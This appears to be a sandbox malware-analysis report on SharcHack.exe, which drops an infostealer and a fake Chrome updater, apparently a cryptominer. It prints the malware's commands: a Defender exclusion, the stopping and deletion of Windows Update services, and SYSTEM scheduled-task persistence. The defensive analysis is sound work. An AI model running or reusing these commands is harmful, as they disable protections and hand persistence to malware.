                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detect the Lighting infostealer based on specific strings Author: Sekoia.io
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                                  Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: Detect the Lighting infostealer based on specific strings Author: Sekoia.io
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: Detects A310Logger Author: ditekSHen
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF14FE0 NtCreateUserProcess,2_2_00007FF69AF14FE0
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\cfoutowi.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF118802_2_00007FF69AF11880
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF131E02_2_00007FF69AF131E0
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF192902_2_00007FF69AF19290
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF13AF02_2_00007FF69AF13AF0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_05996B977_2_05996B97
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_05E329747_2_05E32974
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC85D807_2_6BC85D80
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC4EBD07_2_6BC4EBD0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCB1B807_2_6BCB1B80
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC01B107_2_6BC01B10
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCC3A907_2_6BCC3A90
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE2AD07_2_6BBE2AD0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCADA507_2_6BCADA50
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC36A707_2_6BC36A70
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBF69307_2_6BBF6930
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC3D8007_2_6BC3D800
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBF48707_2_6BBF4870
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBD8FEE7_2_6BBD8FEE
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC13FA07_2_6BC13FA0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCAFE407_2_6BCAFE40
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE0E777_2_6BBE0E77
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC16DD07_2_6BC16DD0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC07D707_2_6BC07D70
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBDFCF97_2_6BBDFCF9
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC37C907_2_6BC37C90
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCC6C507_2_6BCC6C50
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC7F3A07_2_6BC7F3A0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC913407_2_6BC91340
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC1E3507_2_6BC1E350
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE73407_2_6BBE7340
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC462607_2_6BC46260
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE024A7_2_6BBE024A
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBEB1807_2_6BBEB180
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBEC1C07_2_6BBEC1C0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCC71507_2_6BCC7150
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCB21007_2_6BCB2100
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC8C0C07_2_6BC8C0C0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBF50A07_2_6BBF50A0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBEB0507_2_6BBEB050
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC0D7C07_2_6BC0D7C0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE079B7_2_6BBE079B
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC537607_2_6BC53760
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBF46F07_2_6BBF46F0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC786A07_2_6BC786A0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC0A5F07_2_6BC0A5F0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBD45897_2_6BBD4589
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBDB5D17_2_6BBDB5D1
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC975B07_2_6BC975B0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC005507_2_6BC00550
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBEA4A07_2_6BBEA4A0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE24917_2_6BBE2491
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCA04A07_2_6BCA04A0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBE74407_2_6BBE7440
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_012EE1E87_2_012EE1E8
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052B04C87_2_052B04C8
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052B81A07_2_052B81A0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052BF26C7_2_052BF26C
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052BCF8A7_2_052BCF8A
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052BF9E07_2_052BF9E0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052BE5777_2_052BE577
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052B84CB7_2_052B84CB
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_052B818F7_2_052B818F
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B502BC48_2_6B502BC4
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B609A888_2_6B609A88
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B622F258_2_6B622F25
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B60FF908_2_6B60FF90
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4F6E988_2_6B4F6E98
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B530DDA8_2_6B530DDA
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4CA7288_2_6B4CA728
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4E660E8_2_6B4E660E
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B6205998_2_6B620599
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B6244A48_2_6B6244A4
                                  Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: String function: 6BC4FC90 appears 164 times
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: String function: 6BC29320 appears 113 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: String function: 6B600C5F appears 89 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: String function: 6B600D40 appears 64 times
                                  Source: SharcHack.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Source: SharcHack.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                  Source: SharcHack.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                  Source: 3.exe.0.drStatic PE information: Number of sections : 11 > 10
                                  Source: updater.exe.2.drStatic PE information: Number of sections : 11 > 10
                                  Source: SharcHack.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_lighting author = Sekoia.io, description = Detect the Lighting infostealer based on specific strings, creation_date = 2022-04-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/04/05/inside-lightning-stealer/, id = 3c160c16-f417-4fa2-aa44-fb7b981fb2b3
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                                  Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: infostealer_win_lighting author = Sekoia.io, description = Detect the Lighting infostealer based on specific strings, creation_date = 2022-04-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/04/05/inside-lightning-stealer/, id = 3c160c16-f417-4fa2-aa44-fb7b981fb2b3
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPEDMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpKey value queried: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon versionJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpKey value queried: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon versionJump to behavior
                                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@113/99@12/8
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4C3BF0 IsModuleLoaded2,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,8_2_6B4C3BF0
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4D72C8 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,8_2_6B4D72C8
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4C6180 FindResourceW,LoadResource,LockResource,SizeofResource,8_2_6B4C6180
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile created: C:\Users\user\AppData\Roaming\PyFDX932923.userJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpMutant created: \Sessions\1\BaseNamedObjects\{9bad0be7-37a7-44b5-940f-7c5abae5b463}Installer
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6392:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5584:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3836:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6760:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpMutant created: \Sessions\1\BaseNamedObjects\Global\{9bad0be7-37a7-44b5-940f-7c5abae5b463}Installer
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7152:120:WilError_03
                                  Source: C:\Users\user\Desktop\SharcHack.exeFile created: C:\Users\user\AppData\Local\Temp\3.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\SharcHack.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: v2.exe, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: v2.exeBinary or memory string: CREATE TABLE {0}(x);
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: SharcHack.exeVirustotal: Detection: 77%
                                  Source: SharcHack.exeReversingLabs: Detection: 81%
                                  Source: v2.exeString found in binary or memory: /configuration/appSettings/add[@key='{0}']
                                  Source: unknownProcess created: C:\Users\user\Desktop\SharcHack.exe "C:\Users\user\Desktop\SharcHack.exe"
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe"
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeProcess created: C:\Users\user\AppData\Local\Temp\v2.exe "C:\Users\user\AppData\Local\Temp\v2.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp "C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
